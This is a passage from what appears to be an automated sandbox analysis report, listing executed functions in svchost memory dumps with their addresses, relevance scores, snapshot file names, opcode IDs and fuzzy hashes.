                                                                                                                  • Instruction Fuzzy Hash: 8D413962E0DB4A8FE741E77CD4619FCBBB1EF42221F0446B7D04ED71A2DE2894068790
                                                                                                                  Function 00007FFAAC3D0EEE Relevance: .2, Instructions: 199COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 27b737bcac0e980d0bc0ff0e5fada7e6490c36152d8c8aba54de4b99fc7b22e7
                                                                                                                  • Instruction ID: b4af871be8aa99c811a68273f66569938adee4156ae46ef35a23a0215b161561
                                                                                                                  • Opcode Fuzzy Hash: 27b737bcac0e980d0bc0ff0e5fada7e6490c36152d8c8aba54de4b99fc7b22e7
                                                                                                                  • Instruction Fuzzy Hash: DB513862A0EA864FE357A73C9456AB57BD5DF87220B0984FBD08DC71A3DC0C9C478392
                                                                                                                  Function 00007FFAAC3D0A68 Relevance: .2, Instructions: 188COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 441fe0f6611edff2063c2cc49ff38a23fb3c91ddefe3d68ec84d4d8e091a8280
                                                                                                                  • Instruction ID: 20898c9c79531e6ca317e629bbe4120df848c4962e6fa05475813add150ed36e
                                                                                                                  • Opcode Fuzzy Hash: 441fe0f6611edff2063c2cc49ff38a23fb3c91ddefe3d68ec84d4d8e091a8280
                                                                                                                  • Instruction Fuzzy Hash: 9A41091B70B96E8AEB007A7CB841AE9BB54DF8233574883B7D249CB193C955A04A83D0
                                                                                                                  Function 00007FFAAC3D0BF2 Relevance: .2, Instructions: 157COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 83bfe00ecfb43c9f97f5268d2900abf1fb0b6451d0168d309f6ea16d385a2a1a
                                                                                                                  • Instruction ID: f23515f0624d23b35a17dd0b4397d42b7aff97eacb9921414835653aa1ccf928
                                                                                                                  • Opcode Fuzzy Hash: 83bfe00ecfb43c9f97f5268d2900abf1fb0b6451d0168d309f6ea16d385a2a1a
                                                                                                                  • Instruction Fuzzy Hash: FE416865A19B8D8FEB45FBBCC451AECBBE1EF89311F4446B6D009C3297CD28A409C790
                                                                                                                  Function 00007FFAAC3D0870 Relevance: .1, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 75c0a43df3b39c9eac378d18068d13ca0afad7a298acfb25d7696f528c45dca6
                                                                                                                  • Instruction ID: 1d28c09f28b765b6986d313508c63d19a25b04bffdbc3f98ef5a7dff1820c7a9
                                                                                                                  • Opcode Fuzzy Hash: 75c0a43df3b39c9eac378d18068d13ca0afad7a298acfb25d7696f528c45dca6
                                                                                                                  • Instruction Fuzzy Hash: D731A96461878D8FE385F76CC091DA9BBB2AF85206B8485A5D44FC33AADE2C5900C761
                                                                                                                  Function 00007FFAAC3D2421 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 68188dfc9643134f58f53b2657983f679fb8b2a1f574e1ff451888db45a025ac
                                                                                                                  • Instruction ID: c98604f588982d82d834b2e7d96872ccba2281aeada88e6ab7aad0cb81d46128
                                                                                                                  • Opcode Fuzzy Hash: 68188dfc9643134f58f53b2657983f679fb8b2a1f574e1ff451888db45a025ac
                                                                                                                  • Instruction Fuzzy Hash: 82014C5480DB858FF386A3385852D31BFF0CF96212B0845ABE8CDC6097D809D94483D1
                                                                                                                  Function 00007FFAAC3D0E67 Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000012.00000002.1474586168.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_18_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8ae2d00656c269b5a20d35ed1c4b498a1471283228449f71052de3c02b14c7bf
                                                                                                                  • Instruction ID: 3faf859ae5121eade8d7953db2bb38cdb29e84c1f6887b88f240f0a44105647f
                                                                                                                  • Opcode Fuzzy Hash: 8ae2d00656c269b5a20d35ed1c4b498a1471283228449f71052de3c02b14c7bf
                                                                                                                  • Instruction Fuzzy Hash: 32E0ED61B1491D8FEF80EBACD845BFCB2D2EB9C612F1042B7D50ED3292DE2898418391

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFAAC3D1779 Relevance: 7.2, Strings: 5, Instructions: 904COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  • Opcode ID: 4d095613e63a279e9518244b69a66cdabfa764373b27a146c4c2d7fb3c33ad76
                                                                                                                  • Instruction ID: 5d411bb70ccf4822fc292e2f188bf2f90fdea7f1990da3eea382c2813e92a8e6
                                                                                                                  • Opcode Fuzzy Hash: 4d095613e63a279e9518244b69a66cdabfa764373b27a146c4c2d7fb3c33ad76
                                                                                                                  • Instruction Fuzzy Hash: 2252A661B29A098FF795E77CD455BB9B7D2EF99300F4449B9E04EC3292DE28EC058381
                                                                                                                  Function 00007FFAAC3D2259 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 0068a1a5e682c8acb4941888f36071493d450bad58e7d21ebbfc2ff810259827
                                                                                                                  • Instruction ID: 9a3bb92f9dd86dca30ef1b5b183ab07a69e4bb50cd01bf485f5068b73820f472
                                                                                                                  • Opcode Fuzzy Hash: 0068a1a5e682c8acb4941888f36071493d450bad58e7d21ebbfc2ff810259827
                                                                                                                  • Instruction Fuzzy Hash: 7D512151A0EAC54FE786A7788865A75BFE4DF57215B0845FBE0CDC61A3DD088C0AC392
                                                                                                                  Function 00007FFAAC3D09FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :M_^$k:M
                                                                                                                  • API String ID: 0-4016585720
                                                                                                                  • Opcode ID: cc92b7fc9041137581d5a14930d920c7cde205439e0d3dec68134d07bfc4b1cb
                                                                                                                  • Instruction ID: 2e5200f77bc8caa6f8b73d4f619e0459dec43f71fa5babc607cc66ae9971b45d
                                                                                                                  • Opcode Fuzzy Hash: cc92b7fc9041137581d5a14930d920c7cde205439e0d3dec68134d07bfc4b1cb
                                                                                                                  • Instruction Fuzzy Hash: 3001A75B70A6A949E7027BBDF4518ECBB90DE86335B0843F3D3C9CD1638A14508687C5
                                                                                                                  Function 00007FFAAC3D0650 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 140ed14250643cdcff6a2c0d29229e6171325a65e5fae76f088c359b162df2f9
                                                                                                                  • Instruction ID: 03a78872e61e0f682091fc4f824b2669d9657efff8b3da78f380d59d0947cafc
                                                                                                                  • Opcode Fuzzy Hash: 140ed14250643cdcff6a2c0d29229e6171325a65e5fae76f088c359b162df2f9
                                                                                                                  • Instruction Fuzzy Hash: DE31C861B189494FE798EB7CD45AB79B7C6EB99311F0446BAE04EC32A3DD14DC428381
                                                                                                                  Function 00007FFAAC3D0D81 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 10a55e59c8a983b5b4d318be90ebd88abc0f349da35c143cd0d10a2f005e07da
                                                                                                                  • Instruction ID: ef30e67f7865a70c3165296498879bc673903bb1f45fb4c0ddfd6c3bb21618b9
                                                                                                                  • Opcode Fuzzy Hash: 10a55e59c8a983b5b4d318be90ebd88abc0f349da35c143cd0d10a2f005e07da
                                                                                                                  • Instruction Fuzzy Hash: 6D21D352A19F4A4BF785A7B8981ABB9ABD5EF95701F0883BAE00DC3292DD189C014391
                                                                                                                  Function 00007FFAAC3D130D Relevance: .5, Instructions: 512COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3d07f062348b538a1ef22f2066a107dc2e1356d3f6a713bf4c8a099457ca6acb
                                                                                                                  • Instruction ID: 1aa24c25051d22b3f5d71c6d14d58a052e784e8871d55d99e2efdc228f96475f
                                                                                                                  • Opcode Fuzzy Hash: 3d07f062348b538a1ef22f2066a107dc2e1356d3f6a713bf4c8a099457ca6acb
                                                                                                                  • Instruction Fuzzy Hash: 01411872E0AB4A8FE741E76CD4659FCBFB1EF46220B4446B7D14EC71A2DE2894068790
                                                                                                                  Function 00007FFAAC3D0EEE Relevance: .2, Instructions: 199COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: af1bc5f41dc79f55009b80ef6127160241d927d2ff6f0eed98a86ba8f70be7bc
                                                                                                                  • Instruction ID: 42b37b0a8ff372ca2e5bf2bd6d9774ce779862a2add1d0c9a52402a79156d7f9
                                                                                                                  • Opcode Fuzzy Hash: af1bc5f41dc79f55009b80ef6127160241d927d2ff6f0eed98a86ba8f70be7bc
                                                                                                                  • Instruction Fuzzy Hash: E1512862A0EA864FE356A73C9456AB57BD5DF87220B0985FBD08DC71A3DC0C9C478392
                                                                                                                  Function 00007FFAAC3D0A68 Relevance: .2, Instructions: 188COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: adf1b3c1c71eecb746ca957096f7bc3acef051322bb953a3c2bc9957a724831f
                                                                                                                  • Instruction ID: b0abad84ec44caf543dd20d4c01769ad032e9b714c701f352ea00f7d47798b58
                                                                                                                  • Opcode Fuzzy Hash: adf1b3c1c71eecb746ca957096f7bc3acef051322bb953a3c2bc9957a724831f
                                                                                                                  • Instruction Fuzzy Hash: 0A41091770B96E89EB007A7CB8519E97F54DF8233574883B7D249CB193C955A04A83D0
                                                                                                                  Function 00007FFAAC3D0BF2 Relevance: .2, Instructions: 157COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 22228b21fbaa57b8e18db94f044399345158ca2a19d73e96e4a608bbee8fbc16
                                                                                                                  • Instruction ID: 04292c5616556d90c3068f48c092f58c8cc76d4974c37e212b12b94652f208a1
                                                                                                                  • Opcode Fuzzy Hash: 22228b21fbaa57b8e18db94f044399345158ca2a19d73e96e4a608bbee8fbc16
                                                                                                                  • Instruction Fuzzy Hash: 02412861A19A4E9FEB41FB7CD451AEDBBE1EF89300F444AB6D009C7293CD28E446C790
                                                                                                                  Function 00007FFAAC3D0870 Relevance: .1, Instructions: 97COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 51c826c5fde0086bc2c587bb110eb53d73eacfb957f731397ce6b5ce640e60c9
                                                                                                                  • Instruction ID: f63630432f5af67bf2851d2d834f62c6109c15db727bb1e56b4b0e514b5d756f
                                                                                                                  • Opcode Fuzzy Hash: 51c826c5fde0086bc2c587bb110eb53d73eacfb957f731397ce6b5ce640e60c9
                                                                                                                  • Instruction Fuzzy Hash: A631C861E59B4E4FE341E76CC0A1DAABF71FF89300B8485A5D44BC33A6EE68A901C745
                                                                                                                  Function 00007FFAAC3D2421 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5345f78110f1bf556e27c6e95e9a02a9bb1194b029d716c4e987e449da67dd3a
                                                                                                                  • Instruction ID: e1a3a4f1967b4707192243b6146b1cc9cd6206dc582aa5aa52a4f9a7e3ead381
                                                                                                                  • Opcode Fuzzy Hash: 5345f78110f1bf556e27c6e95e9a02a9bb1194b029d716c4e987e449da67dd3a
                                                                                                                  • Instruction Fuzzy Hash: 1B014C9480DB854FF38697385852D31BFF0CF96211B0849ABE8CDC7097E805D94583D1
                                                                                                                  Function 00007FFAAC3D0E67 Relevance: .0, Instructions: 33COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000013.00000002.1563748904.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_19_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8ae2d00656c269b5a20d35ed1c4b498a1471283228449f71052de3c02b14c7bf
                                                                                                                  • Instruction ID: 3faf859ae5121eade8d7953db2bb38cdb29e84c1f6887b88f240f0a44105647f
                                                                                                                  • Opcode Fuzzy Hash: 8ae2d00656c269b5a20d35ed1c4b498a1471283228449f71052de3c02b14c7bf
                                                                                                                  • Instruction Fuzzy Hash: 32E0ED61B1491D8FEF80EBACD845BFCB2D2EB9C612F1042B7D50ED3292DE2898418391

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFAAC3D1779 Relevance: 7.2, Strings: 5, Instructions: 904COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6$6$6$6$"r
                                                                                                                  • API String ID: 0-3979851792
                                                                                                                  • Opcode ID: 3c23ce600ff40fc1215125fe7a59b47accddc13c6d690e7c9c66bb107a49e92b
                                                                                                                  • Instruction ID: 7f434391a2454d8d23e60da905587043d6ca054094acdb797a697ca3d42c13a6
                                                                                                                  • Opcode Fuzzy Hash: 3c23ce600ff40fc1215125fe7a59b47accddc13c6d690e7c9c66bb107a49e92b
                                                                                                                  • Instruction Fuzzy Hash: 7852A661B29A098FF795E77CD455BB9B7D2EF99300F4449B9E04EC3292DE28EC058381
                                                                                                                  Function 00007FFAAC3D2259 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 0068a1a5e682c8acb4941888f36071493d450bad58e7d21ebbfc2ff810259827
                                                                                                                  • Instruction ID: 9a3bb92f9dd86dca30ef1b5b183ab07a69e4bb50cd01bf485f5068b73820f472
                                                                                                                  • Opcode Fuzzy Hash: 0068a1a5e682c8acb4941888f36071493d450bad58e7d21ebbfc2ff810259827
                                                                                                                  • Instruction Fuzzy Hash: 7D512151A0EAC54FE786A7788865A75BFE4DF57215B0845FBE0CDC61A3DD088C0AC392
                                                                                                                  Function 00007FFAAC3D09FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: :M_^$k:M
                                                                                                                  • API String ID: 0-4016585720
                                                                                                                  • Opcode ID: cc92b7fc9041137581d5a14930d920c7cde205439e0d3dec68134d07bfc4b1cb
                                                                                                                  • Instruction ID: 2e5200f77bc8caa6f8b73d4f619e0459dec43f71fa5babc607cc66ae9971b45d
                                                                                                                  • Opcode Fuzzy Hash: cc92b7fc9041137581d5a14930d920c7cde205439e0d3dec68134d07bfc4b1cb
                                                                                                                  • Instruction Fuzzy Hash: 3001A75B70A6A949E7027BBDF4518ECBB90DE86335B0843F3D3C9CD1638A14508687C5
                                                                                                                  Function 00007FFAAC3D0650 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: r6
                                                                                                                  • API String ID: 0-2984296541
                                                                                                                  • Opcode ID: 140ed14250643cdcff6a2c0d29229e6171325a65e5fae76f088c359b162df2f9
                                                                                                                  • Instruction ID: 03a78872e61e0f682091fc4f824b2669d9657efff8b3da78f380d59d0947cafc
                                                                                                                  • Opcode Fuzzy Hash: 140ed14250643cdcff6a2c0d29229e6171325a65e5fae76f088c359b162df2f9
                                                                                                                  • Instruction Fuzzy Hash: DE31C861B189494FE798EB7CD45AB79B7C6EB99311F0446BAE04EC32A3DD14DC428381
                                                                                                                  Function 00007FFAAC3D0D81 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 6
                                                                                                                  • API String ID: 0-1452363761
                                                                                                                  • Opcode ID: 10a55e59c8a983b5b4d318be90ebd88abc0f349da35c143cd0d10a2f005e07da
                                                                                                                  • Instruction ID: ef30e67f7865a70c3165296498879bc673903bb1f45fb4c0ddfd6c3bb21618b9
                                                                                                                  • Opcode Fuzzy Hash: 10a55e59c8a983b5b4d318be90ebd88abc0f349da35c143cd0d10a2f005e07da
                                                                                                                  • Instruction Fuzzy Hash: 6D21D352A19F4A4BF785A7B8981ABB9ABD5EF95701F0883BAE00DC3292DD189C014391
                                                                                                                  Function 00007FFAAC3D130D Relevance: .5, Instructions: 512COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3d07f062348b538a1ef22f2066a107dc2e1356d3f6a713bf4c8a099457ca6acb
                                                                                                                  • Instruction ID: 1aa24c25051d22b3f5d71c6d14d58a052e784e8871d55d99e2efdc228f96475f
                                                                                                                  • Opcode Fuzzy Hash: 3d07f062348b538a1ef22f2066a107dc2e1356d3f6a713bf4c8a099457ca6acb
                                                                                                                  • Instruction Fuzzy Hash: 01411872E0AB4A8FE741E76CD4659FCBFB1EF46220B4446B7D14EC71A2DE2894068790
                                                                                                                  Function 00007FFAAC3D0EEE Relevance: .2, Instructions: 199COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: af1bc5f41dc79f55009b80ef6127160241d927d2ff6f0eed98a86ba8f70be7bc
                                                                                                                  • Instruction ID: 42b37b0a8ff372ca2e5bf2bd6d9774ce779862a2add1d0c9a52402a79156d7f9
                                                                                                                  • Opcode Fuzzy Hash: af1bc5f41dc79f55009b80ef6127160241d927d2ff6f0eed98a86ba8f70be7bc
                                                                                                                  • Instruction Fuzzy Hash: E1512862A0EA864FE356A73C9456AB57BD5DF87220B0985FBD08DC71A3DC0C9C478392
                                                                                                                  Function 00007FFAAC3D0A68 Relevance: .2, Instructions: 188COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: adf1b3c1c71eecb746ca957096f7bc3acef051322bb953a3c2bc9957a724831f
                                                                                                                  • Instruction ID: b0abad84ec44caf543dd20d4c01769ad032e9b714c701f352ea00f7d47798b58
                                                                                                                  • Opcode Fuzzy Hash: adf1b3c1c71eecb746ca957096f7bc3acef051322bb953a3c2bc9957a724831f
                                                                                                                  • Instruction Fuzzy Hash: 0A41091770B96E89EB007A7CB8519E97F54DF8233574883B7D249CB193C955A04A83D0
                                                                                                                  Function 00007FFAAC3D0BF2 Relevance: .2, Instructions: 157COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000014.00000002.1605804387.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_20_2_7ffaac3d0000_svchost.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 22228b21fbaa57b8e18db94f044399345158ca2a19d73e96e4a608bbee8fbc16
                                                                                                                  • Instruction ID: 04292c5616556d90c3068f48c092f58c8cc76d4974c37e212b12b94652f208a1
